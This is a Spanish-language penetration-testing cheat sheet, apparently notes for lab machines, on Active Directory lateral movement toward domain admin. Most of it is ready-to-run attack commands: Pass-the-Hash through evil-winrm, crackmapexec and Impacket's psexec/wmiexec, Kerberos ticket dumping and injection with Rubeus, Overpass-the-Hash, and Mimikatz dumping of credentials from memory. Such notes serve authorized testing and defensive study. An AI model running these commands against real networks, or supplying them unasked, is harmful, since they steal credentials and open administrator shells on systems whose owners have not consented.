Lateral Movement (AD)

[!danger] GOAL: DOMAIN ADMIN Ya eres admin local en una máquina. Tienes hashes o tickets. ¿Cómo saltas a la siguiente?

1. Pass-the-Hash (PtH)

Usar el hash NTLM directamente. No hace falta crackearlo. Requisito: Tener el hash NTLM (aad3b...:5fbc...). Normalmente el hash NTLM es la segunda parte (detrás de los dos puntos).

Evil-WinRMCrackMapExecImpacket (PsExec/WMI)

Lo más cómodo si el puerto 5985 (WinRM) está abierto.

evil-winrm -i <IP> -u Administrator -H <HASH_NTLM>

Para comprobar validez en toda la red (/24).

crackmapexec smb 10.10.x.0/24 -u Administrator -H <HASH_NTLM>

Si ves "Pwn3d!" en verde, tienes acceso ADMIN.

Obtener una shell interactiva.

psexec.py <DOMAIN>/User@<IP> -hashes :<HASH_NTLM>
wmiexec.py <DOMAIN>/User@<IP> -hashes :<HASH_NTLM>

---

2. Pass-the-Ticket (PtT)

Usar tickets Kerberos (.kirbi o .ccache) robados de memoria. Herramienta: Rubeus (Windows) o Mimikatz.

dump & Import (Rubeus)

Desde una sesión como Admin/SYSTEM:

# 1. Ver tickets en memoria
.\Rubeus.exe triage

# 2. Dumpear un ticket específico (ej: de un Domain Admin)
.\Rubeus.exe dump /luid:0x12345 /nowrap

# 3. Importar a tu sesión actual (Pass-the-Ticket)
.\Rubeus.exe ptt /ticket:<BASE64_TICKET_OR_FILE>

# 4. Verificar
klist
# Deberías ver el ticket extra. Ahora puedes acceder a recursos como ese usuario.
dir \\DC01\C$

---

3. Overpass-the-Hash

Convertir un Hash NTLM en un Ticket Kerberos (TGT). Útil cuando NTLM está deshabilitado o quieres persistencia vía Kerberos.

.\Rubeus.exe asktgt /domain:<DOMAIN> /user:<USER> /rc4:<NTLM_HASH> /ptt

Esto pide un TGT usando el hash y lo inyecta (/ptt) en tu sesión.

---

4. Mimikatz (The Classic)

Si prefieres lo clásico.

# Privilege Debug
privilege::debug

# Dump LSA (Hashes & Tickets)
sekurlsa::logonpasswords

# Pass-the-Hash (Abre una nueva cmd.exe)
sekurlsa::pth /user:Administrator /domain:htb.local /ntlm:<HASH>